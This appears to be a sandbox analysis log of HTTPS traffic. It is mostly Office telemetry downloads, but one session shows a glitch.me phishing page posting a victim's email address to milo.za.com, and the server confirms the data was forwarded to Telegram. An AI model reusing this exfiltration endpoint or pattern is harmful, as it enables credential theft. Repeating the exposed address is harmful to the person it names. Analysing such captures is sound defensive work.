                                                                                                                                                                                                            2024-11-06 05:29:38 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                                                            Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                                                            2024-11-06 05:29:39 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                                                            Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                                                            2024-11-06 05:29:39 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                                                                                                            2024-11-06 05:29:39 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                                                            Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                                                                                                            2024-11-06 05:29:39 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                                                            2024-11-06 05:29:39 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                                                            2024-11-06 05:29:39 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                                                            2024-11-06 05:29:39 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.457681188.114.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC705OUTPOST //pood/phpp4all.php HTTP/1.1
                                                                                                                                                                                                            Host: milo.za.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Content-Length: 260
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIgbRAlh9GJNKqSCX
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Origin: https://astonishing-maize-sunstone.glitch.me
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 49 67 62 52 41 6c 68 39 47 4a 4e 4b 71 53 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 0d 0a 0d 0a 4d 61 74 74 68 65 77 2e 48 61 72 64 69 6e 67 40 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 49 67 62 52 41 6c 68 39 47 4a 4e 4b 71 53 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 49 67 62 52 41 6c 68 39 47 4a 4e 4b 71 53 43
                                                                                                                                                                                                            Data Ascii: ------WebKitFormBoundaryIgbRAlh9GJNKqSCXContent-Disposition: form-data; name="userid"Matthew.Harding@elders.com.au------WebKitFormBoundaryIgbRAlh9GJNKqSCXContent-Disposition: form-data; name="userpwd"------WebKitFormBoundaryIgbRAlh9GJNKqSC
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC877INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:41 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZT9Oc1KXewMXFWXUxYFxbFITgwL3B2tMK%2FDvb4lUOzGoRpyCv%2BkXTF%2B3RKv4LJWKBWwYaJ0NSTCxA2XG%2FF6hglRXRWWp1NRBDacmCNpaqaW%2F5kk9TodZo5Yvn7e5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2afee78166c3a-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1363&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1565&delivery_rate=2238021&cwnd=251&unsent_bytes=0&cid=e4fc7c09dca7158c&ts=656&x=0"
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                                                                            Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            13192.168.2.45767713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                            x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052940Z-16547b76f7fxdzxghC1DFWmf7n00000006c0000000003hk1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            14192.168.2.45767613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                            x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052940Z-16547b76f7f9bs6dhC1DFWt3rg00000006800000000034pf
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            15192.168.2.45767913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                            x-ms-request-id: d78ce712-d01e-007a-194f-2ef38c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052940Z-15869dbbcc6lxrkghC1DFWp3wc00000006ng000000000za6
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            16192.168.2.45767813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                            x-ms-request-id: 7513f58e-b01e-005c-2901-2d4c66000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052940Z-16547b76f7fxsvjdhC1DFWprrs000000065g000000004f60
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
